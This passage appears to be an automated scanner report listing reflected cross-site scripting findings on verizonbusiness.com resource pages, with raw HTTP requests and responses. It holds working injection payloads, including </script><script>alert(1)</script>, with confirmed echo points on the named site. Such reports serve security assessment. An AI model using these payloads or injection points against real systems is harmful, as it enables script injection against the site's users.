Set-Cookie: BERT=VRID%3dede64427-1ae3-4cae-9b0a-debe77064f73|VTID%3dc06b9998-8254-484e-87b9-411042174e65|SX%3d1289954635|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:27:39 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:23:55 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<url>/resources/1002a2a17-111-Expanding+Into+New+Markets.xml9dbf0</script><script>alert(1)</script>b9e986f25bc</url>
...[SNIP]...

1.613. http://www.verizonbusiness.com/resources/1002a2a18-111-Going+Green.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a18-111-Going+Green.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5dde2"%3bb708390f7e2 was submitted in the REST URL parameter 1. This input was echoed as 5dde2";b708390f7e2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources5dde2"%3bb708390f7e2/1002a2a18-111-Going+Green.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:23:19 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40658
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:23:19 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:23:19 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources5dde2";b708390f7e2/1002a2a18-111-Going+Green.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELE
...[SNIP]...

1.614. http://www.verizonbusiness.com/resources/1002a2a18-111-Going+Green.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a18-111-Going+Green.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 72221'%3beeda792b864 was submitted in the REST URL parameter 1. This input was echoed as 72221';eeda792b864 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources72221'%3beeda792b864/1002a2a18-111-Going+Green.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:23:27 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40660
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:23:27 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:23:27 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/resources72221';eeda792b864/1002a2a18-111-Going+Green.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.615. http://www.verizonbusiness.com/resources/1002a2a18-111-Going+Green.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a18-111-Going+Green.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b3c86'%3b8de0ea00750 was submitted in the REST URL parameter 2. This input was echoed as b3c86';8de0ea00750 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/b3c86'%3b8de0ea00750 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:26:24 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:26:24 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:26:24 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources/b3c86';8de0ea00750'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.616. http://www.verizonbusiness.com/resources/1002a2a18-111-Going+Green.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a18-111-Going+Green.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d50cc</script><script>alert(1)</script>ac3431dd5e1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a2a18-111-Going+Green.xmld50cc</script><script>alert(1)</script>ac3431dd5e1 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "ecb53c395cd8c9772c3131f0f0aa20aa"
Last-Modified: Wed, 17 Nov 2010 00:26:08 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:26:08 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3d50ea8a0c-a7e9-4757-9739-ae844f916564|VTID%3d2e916e60-a7e2-4c95-a3c2-aa2976b8ce15|SX%3d1289954768|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:29:52 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:26:08 GMT
Content-Length: 40495

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<url>/resources/1002a2a18-111-Going+Green.xmld50cc</script><script>alert(1)</script>ac3431dd5e1</url>
...[SNIP]...

1.617. http://www.verizonbusiness.com/resources/1002a2a19-111-Improving+Productivity.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a19-111-Improving+Productivity.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e18a"%3b1f585edfd56 was submitted in the REST URL parameter 1. This input was echoed as 8e18a";1f585edfd56 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources8e18a"%3b1f585edfd56/1002a2a19-111-Improving+Productivity.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:23:36 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 40680
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:23:36 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:23:36 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources8e18a";1f585edfd56/1002a2a19-111-Improving+Productivity.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION
...[SNIP]...

1.618. http://www.verizonbusiness.com/resources/1002a2a19-111-Improving+Productivity.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a19-111-Improving+Productivity.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 342d4'%3b6120a4e522b was submitted in the REST URL parameter 1. This input was echoed as 342d4';6120a4e522b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources342d4'%3b6120a4e522b/1002a2a19-111-Improving+Productivity.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:23:44 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40680
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:23:44 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:23:44 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources342d4';6120a4e522b/1002a2a19-111-Improving+Productivity.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.619. http://www.verizonbusiness.com/resources/1002a2a19-111-Improving+Productivity.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a19-111-Improving+Productivity.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f6ab</script><script>alert(1)</script>523e1ff0542 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a2a19-111-Improving+Productivity.xml6f6ab</script><script>alert(1)</script>523e1ff0542 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "4fe11e7252c5fdc57815d5e3523c976a"
Last-Modified: Wed, 17 Nov 2010 00:26:47 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:26:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3d12b08b67-f418-4ccc-954b-00af989ca0db|VTID%3d89fe2116-6729-4c3b-ad1f-73c702c6492f|SX%3d1289954806|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:30:30 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:26:47 GMT
Content-Length: 38971

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
<url>/resources/1002a2a19-111-Improving+Productivity.xml6f6ab</script><script>alert(1)</script>523e1ff0542</url>
...[SNIP]...

1.620. http://www.verizonbusiness.com/resources/1002a2a19-111-Improving+Productivity.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a19-111-Improving+Productivity.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5c7af'%3b68aed609408 was submitted in the REST URL parameter 2. This input was echoed as 5c7af';68aed609408 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/5c7af'%3b68aed609408 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:26:49 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40210
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:26:49 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:26:49 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/5c7af';68aed609408'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.621. http://www.verizonbusiness.com/resources/1002a2a2-111-Conferencing.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a2-111-Conferencing.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4b59"%3b45fc3c39ca4 was submitted in the REST URL parameter 1. This input was echoed as e4b59";45fc3c39ca4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcese4b59"%3b45fc3c39ca4/1002a2a2-111-Conferencing.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:19:37 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40658
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:19:37 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:19:37 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resourcese4b59";45fc3c39ca4/1002a2a2-111-Conferencing.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELE
...[SNIP]...

1.622. http://www.verizonbusiness.com/resources/1002a2a2-111-Conferencing.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a2-111-Conferencing.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 51d92'%3bc5380f9268a was submitted in the REST URL parameter 1. This input was echoed as 51d92';c5380f9268a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources51d92'%3bc5380f9268a/1002a2a2-111-Conferencing.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:19:53 GMT
Content-Type: text/html
Content-Length: 40660
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:19:54 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:19:53 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources51d92';c5380f9268a/1002a2a2-111-Conferencing.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.623. http://www.verizonbusiness.com/resources/1002a2a2-111-Conferencing.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a2-111-Conferencing.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b67e4'%3bee33f56f39d was submitted in the REST URL parameter 2. This input was echoed as b67e4';ee33f56f39d in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/b67e4'%3bee33f56f39d HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:22:02 GMT
Content-Type: text/html
Content-Length: 40212
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:22:02 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:22:02 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/b67e4';ee33f56f39d'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.624. http://www.verizonbusiness.com/resources/1002a2a2-111-Conferencing.xml [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a2-111-Conferencing.xml

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 826ee</script><script>alert(1)</script>d957ea4511f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/1002a2a2-111-Conferencing.xml826ee</script><script>alert(1)</script>d957ea4511f HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 200 OK
Server: Roxen/4.5.146-release3
ETag: "002976f3db11484242cddd5990429a76"
Last-Modified: Wed, 17 Nov 2010 00:22:00 GMT
Content-Type: text/html; charset=ISO-8859-1
Vary: User-Agent
Date: Wed, 17 Nov 2010 00:22:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: BERT=VRID%3df3136736-9d53-459c-a764-3b0181d0ee0f|VTID%3d1b8b9046-1477-46db-af61-84aac1e49506|SX%3d1289954520|VP%3d1|RMC%3dxg|LP%3den; expires=Tue, 17 Nov 2015 05:25:44 GMT; domain=www.verizonbusiness.com; path=/
Expires: Mon, 16 Nov 2009 18:22:00 GMT
Content-Length: 49832

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<url>/resources/1002a2a2-111-Conferencing.xml826ee</script><script>alert(1)</script>d957ea4511f</url>
...[SNIP]...

1.625. http://www.verizonbusiness.com/resources/1002a2a20-111-Mobility.xml [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/1002a2a20-111-Mobility.xml

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c698e'%3bd962ad9b50c was submitted in the REST URL parameter 1. This input was echoed as c698e';d962ad9b50c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resourcesc698e'%3bd962ad9b50c/1002a2a20-111-Mobility.xml HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
